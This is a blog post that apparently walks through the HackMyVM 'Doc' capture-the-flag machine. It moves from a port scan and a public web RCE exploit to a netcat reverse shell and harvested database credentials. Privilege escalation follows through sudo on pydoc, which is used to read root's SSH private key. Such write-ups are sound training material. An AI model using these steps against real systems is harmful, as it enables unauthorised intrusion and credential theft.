Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Doc Walkthrough

HackMyVm Doc Walkthrough

Scan ports, only port 80 is open.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for bah.hmv (
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Check port 80, it's Online Traffic Offense Management System. Google the exploit, and add doc.hmv to /etc/hosts.

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Use the POC to get user shell.

 ~ (p2) python
 Url: http://doc.hmv
 Check Url ...
 [+] Bypass Login
 [+] Upload Shell
 [+] Exploit Done!
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Because this shell is not full functional, we spawn another reverse shell.

 $ nc 1234 -e /bin/bash
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella.

 www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");

Escalate to user bella.

 www-data@doc:~/html/traffic_offense$ su bella
 su bella
 Password: be114yTU
 bella@doc:/var/www/html/traffic_offense$ id
 uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check local port, port 21 is actually ssh, so we portforword it outside.

 bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80*          
 LISTEN 0      511*          
 LISTEN 0      128*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp: &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp: &
 [1] 571

Check sudo -l.

 bella@doc:~$ sudo -l
 Matching Defaults entries for bella on doc:
     env_reset, mail_badpass,
 User bella may run the following commands on doc:
     (ALL : ALL) NOPASSWD: /usr/bin/doc

Disassemble doc, we know it's actually pydoc3.9.

 ; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 pop     rbp
 ; } // starts at 1135
 main endp

Google exploit of pydoc.

Start doc server.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit

In another term, we login ssh as user bella, and get the ssh key of root.

 ~ ssh bella@ -p 5000       
 bella@'s password:
 Last login: Thu Aug 26 21:33:08 2021 from
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa

Login ssh as root.

 ~ ssh root@ -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.0